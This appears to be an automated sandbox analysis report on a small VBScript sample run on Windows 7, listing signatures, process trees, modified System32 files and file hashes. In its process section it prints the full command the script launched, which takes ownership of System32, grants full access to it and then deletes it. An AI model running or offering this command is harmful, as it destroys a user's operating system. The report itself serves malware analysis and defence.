Analysis
- max time kernel: 119s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240419-en
- resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
- submitted: 25-05-2024 16:19

Static task: static1
Behavioral task: behavioral1
Sample: target.vbs
Resource: win7-20240419-en

General
- Target: target.vbs
- Size: 209B
- MD5: fe505a5e05c25e1b991d6f6094899bdf
- SHA1: 3dda3dbed85f227a9563b8b7e94b1fbfc9ec5d99
- SHA256: dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
- SHA512: c7c39c1ddcb6c4a83489b14c459f0446bd1585bf4d840e7026a08b4341584ee48381b23a182f3f7fc74c04568a6428b00ffadab5954dbd6e3f2967b805c5340f
Malware Config
Signatures
- Manipulates Digital Signatures (1 IoC)
  Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
  Processes: cmd.exe
    description: File opened for modification | ioc: C:\Windows\System32\wintrust.dll | process: cmd.exe
- Possible privilege escalation attempt (2 IoCs)
  Processes: takeown.exe, icacls.exe
    pid: 2824 | process: takeown.exe
    pid: 2516 | process: icacls.exe
- Loads dropped DLL (7 IoCs)
  Processes: WMIADAP.EXE
    pid: 2536 | process: WMIADAP.EXE (4 entries)
    pid: 1196 | process: not named in the report (3 entries)
- Modifies file permissions (1 TTP, 2 IoCs)
  Processes: takeown.exe, icacls.exe
    pid: 2824 | process: takeown.exe
    pid: 2516 | process: icacls.exe
- Drops file in System32 directory (64 IoCs)
  Processes: cmd.exe
  All 64 entries carry the description "File opened for modification" and the process cmd.exe; the ioc paths are:
    C:\Windows\System32\comdlg32.dll
    C:\Windows\System32\FXSAPI.dll
    C:\Windows\System32\mfplat.dll
    C:\Windows\System32\shlwapi.dll
    C:\Windows\System32\imagehlp.dll
    C:\Windows\System32\sxs.dll
    C:\Windows\System32\winevt\Logs\MICROS~1.EVT
    C:\Windows\System32\cscapi.dll
    C:\Windows\System32\normaliz.dll
    C:\Windows\System32\wbem\wbemprox.dll
    C:\Windows\System32\usp10.dll
    C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll
    C:\Windows\System32\FWPUCLNT.DLL
    C:\Windows\System32\syncui.dll
    C:\Windows\System32\usbmon.dll
    C:\Windows\System32\webservices.dll
    C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll
    C:\Windows\System32\cfgmgr32.dll
    C:\Windows\System32\C_949.NLS
    C:\Windows\System32\en-US\bthprops.cpl.mui
    C:\Windows\System32\gdi32.dll
    C:\Windows\System32\7B296F~2.C74
    C:\Windows\System32\config\SECURI~2.LOG
    C:\Windows\System32\winevt\Logs\MICROS~4.EVT
    C:\Windows\System32\wininit.exe
    C:\Windows\System32\fveapi.dll
    C:\Windows\System32\netapi32.dll
    C:\Windows\System32\tbs.dll
    C:\Windows\System32\inetpp.dll
    C:\Windows\System32\nsi.dll
    C:\Windows\System32\wbem\NCProv.dll
    C:\Windows\System32\bitsperf.dll
    C:\Windows\System32\config\TxR\{01688~2.REG
    C:\Windows\System32\gameux.dll
    C:\Windows\System32\framedynos.dll
    C:\Windows\System32\netutils.dll
    C:\Windows\System32\sfc_os.dll
    C:\Windows\System32\Syncreg.dll
    C:\Windows\System32\winevt\Logs\MI7771~1.EVT
    C:\Windows\System32\batmeter.dll
    C:\Windows\System32\snmpapi.dll
    C:\Windows\System32\TSpkg.dll
    C:\Windows\System32\esent.dll
    C:\Windows\System32\netman.dll
    C:\Windows\System32\imapi2.dll
    C:\Windows\System32\wbem\repdrvfs.dll
    C:\Windows\System32\WindowsCodecs.dll
    C:\Windows\System32\ubpm.dll
    C:\Windows\System32\config\RegBack\SAM
    C:\Windows\System32\msxml6r.dll
    C:\Windows\System32\netjoin.dll
    C:\Windows\System32\psapi.dll
    C:\Windows\System32\xmllite.dll
    C:\Windows\System32\oleacc.dll
    C:\Windows\System32\pcwum.dll
    C:\Windows\System32\winevt\Logs\MIA934~1.EVT
    C:\Windows\System32\mprapi.dll
    C:\Windows\System32\winevt\Logs\MI03A7~1.EVT
    C:\Windows\System32\BFE.DLL
    C:\Windows\System32\bitsigd.dll
    C:\Windows\System32\thumbcache.dll
    C:\Windows\System32\secur32.dll
    C:\Windows\System32\UIAnimation.dll
    C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: takeown.exe
    description: Token: SeTakeOwnershipPrivilege | pid: 2824 | process: takeown.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes: WScript.exe, cmd.exe
    description: PID 1320 wrote to memory of 2412 | pid: 1320 | process: WScript.exe | target process: cmd.exe (3 entries)
    description: PID 2412 wrote to memory of 2824 | pid: 2412 | process: cmd.exe | target process: takeown.exe (3 entries)
    description: PID 2412 wrote to memory of 2516 | pid: 2412 | process: cmd.exe | target process: icacls.exe (3 entries)
Processes
- C:\Windows\System32\WScript.exe (level 1)
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (level 2)
    command line: "C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32
    - Manipulates Digital Signatures
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\takeown.exe (level 3)
      command line: takeown /f C:\Windows\System32 /r /d y
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (level 3)
      command line: icacls C:\Windows\System32 /grant administrators:F /t
      - Possible privilege escalation attempt
      - Modifies file permissions
- C:\Windows\explorer.exe (level 1)
  command line: "C:\Windows\explorer.exe"
- C:\Windows\system32\wbem\WMIADAP.EXE (level 1)
  command line: wmiadap.exe /F /T
  - Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- \Windows\System32\advapi32.dll
  Filesize: 856KB
  MD5: 6df46d2bd74e3da1b45f08f10d172732
  SHA1: 3491f8f9a73c00b158e43a530210d67a4f0598ae
  SHA256: 2dc945f6f2c4a82189bc7da2fcbb7d9a0e2588a909539249e55ba82468e0c677
  SHA512: 648d07a7bec83f45629d34defde0421f449998f3a290cca2ff3941ef2f551ce508c204cb2e0ba02c6b79dfcf7a7c2f2ac3056f286ca63d31e033db7c524f9abb
- \Windows\System32\clbcatq.dll
  Filesize: 593KB
  MD5: 25983de69b57142039ac8d95e71cd9c9
  SHA1: 01691e3b0bfa569e64bdb7dc3d637a867ed2dc08
  SHA256: a677da7ebcbcb6073d27e8a38809f51e971e83ed379bc599aaad6ef4216348da
  SHA512: dfd22fb0570e3c1caf908305f04aec9c7cbe8332f6d6409b8c724baca523354c93bc240bf6d7944c892a4fc221c099d5fbf0b9526a9d9bb7c13ba367e876afec
- \Windows\System32\cryptbase.dll
  Filesize: 43KB
  MD5: 784fa3df338e2e8f5f0389d6fac428af
  SHA1: 6d32c67c91c6d374854e907c6719db2538540867
  SHA256: 9c8aa0cfdeb9e38aaf8eb08626070e0f0364f4f8a793cfe3532ec6c007980c34
  SHA512: a147e689c6fcca7bab690aec17deef74d6935338cd159bcb10acc2ad76841e6abbd9290ac17e2f5b5ec3422823a1e716e7cd5c5a1b950937c5295e14b68ac53c
- \Windows\System32\cryptsp.dll
  Filesize: 78KB
  MD5: d0c2fbb6d97416b0166478fc7ae2b212
  SHA1: e290bdf2312ac30a4e9f2a96d7c84714eee84899
  SHA256: 7eab6c37f0a845e645ca44cc060ac6c56e386c7ef7a64716c6786c9602ad8c9d
  SHA512: ee3cc1a1b21a0ee16532dfc0713f1b369414f521937e44851ba338eaf188109779b9b615ce37bf4cff572a9484d99d9a36184b9120cf4990fc2d2791ed680e87
- \Windows\System32\imageres.dll
  Filesize: 19.3MB
  MD5: 5aa945234e9d4cce4f715276b9aa712c
  SHA1: dba3c8cecb3f8d4b1d96265d8519dbe0e911f446
  SHA256: 65165bd131056816f009d987fc78ac86ffe0c3c38a27e73f873586b7ff4d59cf
  SHA512: acf0d5706662b3f4abb68b94aad9155c17dc74ccf3a92ed97c9bc2abdf4f8fd32705bb7692836452304301605561121b4ef2b82b81563f9bf2a9d1c71e8c6233
- \Windows\System32\wscript.exe
  Filesize: 165KB
  MD5: 8886e0697b0a93c521f99099ef643450
  SHA1: 851bd390bf559e702b8323062dbeb251d9f2f6f7
  SHA256: d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
  SHA512: fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837